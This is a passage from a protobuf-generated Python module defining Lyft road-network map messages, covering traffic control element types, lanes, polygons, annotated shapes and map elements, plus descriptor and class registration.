_TRAFFICCONTROLELEMENT.fields_by_name['stop_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['stop_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['yield_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['yield_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['stop_line'])
_TRAFFICCONTROLELEMENT.fields_by_name['stop_line'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['traffic_light'])
_TRAFFICCONTROLELEMENT.fields_by_name['traffic_light'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_yellow'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_yellow'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_red'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_flashing_red'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_red_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_red_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_yellow_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_yellow_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_green_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_left_arrow_green_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_red_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_red_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_yellow_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_yellow_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_green_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_right_arrow_green_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_red_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_red_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_yellow_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_yellow_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_green_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_left_arrow_green_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_red_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_red_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_yellow_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_yellow_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_green_face'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_upper_right_arrow_green_face'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_u_turn'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_red_u_turn'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_u_turn'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_yellow_u_turn'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_u_turn'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_green_u_turn'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump'])
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['speed_hump'])
_TRAFFICCONTROLELEMENT.fields_by_name['speed_hump'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crosswalk'])
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crosswalk'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['keep_clear_zone'])
_TRAFFICCONTROLELEMENT.fields_by_name['keep_clear_zone'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crossing_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['pedestrian_crossing_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['signal_ahead_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['signal_ahead_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_yield_on_green_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_yield_on_green_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_parking_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_parking_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['one_way_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['one_way_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['school_zone_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['school_zone_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['parking_zone'])
_TRAFFICCONTROLELEMENT.fields_by_name['parking_zone'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['speed_bump_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone'])
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['stop_here_for_pedestrians_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['stop_here_for_pedestrians_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_stop_for_pedestrian_in_crosswalk_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_stop_for_pedestrian_in_crosswalk_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['yield_here_for_pedestrians_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['yield_here_for_pedestrians_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['turning_vehicles_yield_to_pedestrians_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['turning_vehicles_yield_to_pedestrians_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_yield_for_pedestrian_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['state_law_yield_for_pedestrian_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_regulatory_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_regulatory_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_warning_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_warning_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_other_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['railroad_crossing_other_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_circulation_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_circulation_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_directional_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_directional_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_other_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['roundabout_other_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_on_red_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_turn_on_red_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_on_red_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_right_turn_on_red_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_turn_on_red_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_turn_on_red_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['do_not_enter_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['do_not_enter_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_u_turn_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_u_turn_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_and_u_turn_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_left_and_u_turn_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['no_straight_through_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['no_straight_through_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_only_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['left_turn_only_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['right_turn_only_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['right_turn_only_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['u_turn_only_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['u_turn_only_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['straight_through_only_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['straight_through_only_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['other_turn_restriction_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['other_turn_restriction_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_TRAFFICCONTROLELEMENT.oneofs_by_name['Type'].fields.append(
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone_sign'])
_TRAFFICCONTROLELEMENT.fields_by_name['construction_zone_sign'].containing_oneof = _TRAFFICCONTROLELEMENT.oneofs_by_name['Type']
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION.fields_by_name['segment'].message_type = _GLOBALID
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION.fields_by_name['orientation'].enum_type = _SEGMENTSEQUENCE_SEGMENTWITHORIENTATION_ORIENTATION
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION.containing_type = _SEGMENTSEQUENCE
_SEGMENTSEQUENCE_SEGMENTWITHORIENTATION_ORIENTATION.containing_type = _SEGMENTSEQUENCE_SEGMENTWITHORIENTATION
_SEGMENTSEQUENCE.fields_by_name['type'].enum_type = _SEGMENTSEQUENCE_TYPE
_SEGMENTSEQUENCE.fields_by_name['segments'].message_type = _SEGMENTSEQUENCE_SEGMENTWITHORIENTATION
_SEGMENTSEQUENCE_TYPE.containing_type = _SEGMENTSEQUENCE
_LANESEQUENCE.fields_by_name['lanes'].message_type = _GLOBALID
_LANESEQUENCES.fields_by_name['lane_sequences'].message_type = _LANESEQUENCE
_POLYGON.fields_by_name['shell_vertices'].message_type = _GEOLOCATION
_POLYGON.fields_by_name['holes'].message_type = _POLYGON
_MULTIPOLYGON.fields_by_name['polygons'].message_type = _POLYGON
_ANNOTATEDSHAPE_BUILDING.fields_by_name['type'].enum_type = _ANNOTATEDSHAPE_BUILDING_TYPE
_ANNOTATEDSHAPE_BUILDING.containing_type = _ANNOTATEDSHAPE
_ANNOTATEDSHAPE_BUILDING_TYPE.containing_type = _ANNOTATEDSHAPE_BUILDING
_ANNOTATEDSHAPE_REGION.containing_type = _ANNOTATEDSHAPE
_ANNOTATEDSHAPE.fields_by_name['name'].message_type = _LOCALIZEDSTRING
_ANNOTATEDSHAPE.fields_by_name['multipolygon'].message_type = _MULTIPOLYGON
_ANNOTATEDSHAPE.fields_by_name['building'].message_type = _ANNOTATEDSHAPE_BUILDING
_ANNOTATEDSHAPE.fields_by_name['region'].message_type = _ANNOTATEDSHAPE_REGION
_ANNOTATEDSHAPE.fields_by_name['venue'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_ANNOTATEDSHAPE.fields_by_name['administrative_boundary'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_ANNOTATEDSHAPE.fields_by_name['park'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_ANNOTATEDSHAPE.fields_by_name['drivable_surface_prior'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['building'])
_ANNOTATEDSHAPE.fields_by_name['building'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['region'])
_ANNOTATEDSHAPE.fields_by_name['region'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['venue'])
_ANNOTATEDSHAPE.fields_by_name['venue'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['administrative_boundary'])
_ANNOTATEDSHAPE.fields_by_name['administrative_boundary'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['park'])
_ANNOTATEDSHAPE.fields_by_name['park'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_ANNOTATEDSHAPE.oneofs_by_name['Type'].fields.append(
_ANNOTATEDSHAPE.fields_by_name['drivable_surface_prior'])
_ANNOTATEDSHAPE.fields_by_name['drivable_surface_prior'].containing_oneof = _ANNOTATEDSHAPE.oneofs_by_name['Type']
_LATLNGBOX.fields_by_name['south_west'].message_type = _GEOLOCATION
_LATLNGBOX.fields_by_name['north_east'].message_type = _GEOLOCATION
_MAPELEMENT_ELEMENT.fields_by_name['segment'].message_type = _ROADNETWORKSEGMENT
_MAPELEMENT_ELEMENT.fields_by_name['node'].message_type = _ROADNETWORKNODE
_MAPELEMENT_ELEMENT.fields_by_name['lane'].message_type = _LANE
_MAPELEMENT_ELEMENT.fields_by_name['traffic_control_element'].message_type = _TRAFFICCONTROLELEMENT
_MAPELEMENT_ELEMENT.fields_by_name['junction'].message_type = _JUNCTION
_MAPELEMENT_ELEMENT.fields_by_name['segment_sequence'].message_type = _SEGMENTSEQUENCE
_MAPELEMENT_ELEMENT.fields_by_name['annotated_shape'].message_type = _ANNOTATEDSHAPE
_MAPELEMENT_ELEMENT.containing_type = _MAPELEMENT
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['segment'])
_MAPELEMENT_ELEMENT.fields_by_name['segment'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['node'])
_MAPELEMENT_ELEMENT.fields_by_name['node'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['lane'])
_MAPELEMENT_ELEMENT.fields_by_name['lane'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['traffic_control_element'])
_MAPELEMENT_ELEMENT.fields_by_name['traffic_control_element'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['junction'])
_MAPELEMENT_ELEMENT.fields_by_name['junction'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['segment_sequence'])
_MAPELEMENT_ELEMENT.fields_by_name['segment_sequence'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ELEMENT.oneofs_by_name['element'].fields.append(
_MAPELEMENT_ELEMENT.fields_by_name['annotated_shape'])
_MAPELEMENT_ELEMENT.fields_by_name['annotated_shape'].containing_oneof = _MAPELEMENT_ELEMENT.oneofs_by_name['element']
_MAPELEMENT_ASSOCIATEDCONDITIONS.fields_by_name['conditions'].message_type = _CONDITION
_MAPELEMENT_ASSOCIATEDCONDITIONS.fields_by_name['overrides'].message_type = _MAPELEMENT_ELEMENT
_MAPELEMENT_ASSOCIATEDCONDITIONS.containing_type = _MAPELEMENT
_MAPELEMENT_DEBUGINFOENTRY.containing_type = _MAPELEMENT
_MAPELEMENT.fields_by_name['id'].message_type = _GLOBALID
_MAPELEMENT.fields_by_name['element'].message_type = _MAPELEMENT_ELEMENT
_MAPELEMENT.fields_by_name['bounding_box'].message_type = _LATLNGBOX
_MAPELEMENT.fields_by_name['associated_conditions'].message_type = _MAPELEMENT_ASSOCIATEDCONDITIONS
_MAPELEMENT.fields_by_name['debug_info'].message_type = _MAPELEMENT_DEBUGINFOENTRY
_MAPFRAGMENT.fields_by_name['elements'].message_type = _MAPELEMENT
DESCRIPTOR.message_types_by_name['GlobalId'] = _GLOBALID
DESCRIPTOR.message_types_by_name['GeoLocation'] = _GEOLOCATION
DESCRIPTOR.message_types_by_name['GeoFrame'] = _GEOFRAME
DESCRIPTOR.message_types_by_name['LocalizedString'] = _LOCALIZEDSTRING
DESCRIPTOR.message_types_by_name['RoadNetworkNode'] = _ROADNETWORKNODE
DESCRIPTOR.message_types_by_name['AccessRestriction'] = _ACCESSRESTRICTION
DESCRIPTOR.message_types_by_name['DailyTimeInterval'] = _DAILYTIMEINTERVAL
DESCRIPTOR.message_types_by_name['Schedule'] = _SCHEDULE
DESCRIPTOR.message_types_by_name['Condition'] = _CONDITION
DESCRIPTOR.message_types_by_name['RoadNetworkSegment'] = _ROADNETWORKSEGMENT
DESCRIPTOR.message_types_by_name['Junction'] = _JUNCTION
DESCRIPTOR.message_types_by_name['Lane'] = _LANE
DESCRIPTOR.message_types_by_name['TrafficControlElement'] = _TRAFFICCONTROLELEMENT
DESCRIPTOR.message_types_by_name['SegmentSequence'] = _SEGMENTSEQUENCE
DESCRIPTOR.message_types_by_name['LaneSequence'] = _LANESEQUENCE
DESCRIPTOR.message_types_by_name['LaneSequences'] = _LANESEQUENCES
DESCRIPTOR.message_types_by_name['Polygon'] = _POLYGON
DESCRIPTOR.message_types_by_name['MultiPolygon'] = _MULTIPOLYGON
DESCRIPTOR.message_types_by_name['AnnotatedShape'] = _ANNOTATEDSHAPE
DESCRIPTOR.message_types_by_name['LatLngBox'] = _LATLNGBOX
DESCRIPTOR.message_types_by_name['MapElement'] = _MAPELEMENT
DESCRIPTOR.message_types_by_name['MapFragment'] = _MAPFRAGMENT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GlobalId = _reflection.GeneratedProtocolMessageType('GlobalId', (_message.Message,), {
'DESCRIPTOR' : _GLOBALID,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.GlobalId)
})
_sym_db.RegisterMessage(GlobalId)
GeoLocation = _reflection.GeneratedProtocolMessageType('GeoLocation', (_message.Message,), {
'DESCRIPTOR' : _GEOLOCATION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.GeoLocation)
})
_sym_db.RegisterMessage(GeoLocation)
GeoFrame = _reflection.GeneratedProtocolMessageType('GeoFrame', (_message.Message,), {
'DESCRIPTOR' : _GEOFRAME,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.GeoFrame)
})
_sym_db.RegisterMessage(GeoFrame)
LocalizedString = _reflection.GeneratedProtocolMessageType('LocalizedString', (_message.Message,), {
'DESCRIPTOR' : _LOCALIZEDSTRING,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.LocalizedString)
})
_sym_db.RegisterMessage(LocalizedString)
RoadNetworkNode = _reflection.GeneratedProtocolMessageType('RoadNetworkNode', (_message.Message,), {
'DESCRIPTOR' : _ROADNETWORKNODE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.RoadNetworkNode)
})
_sym_db.RegisterMessage(RoadNetworkNode)
AccessRestriction = _reflection.GeneratedProtocolMessageType('AccessRestriction', (_message.Message,), {
'DESCRIPTOR' : _ACCESSRESTRICTION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.AccessRestriction)
})
_sym_db.RegisterMessage(AccessRestriction)
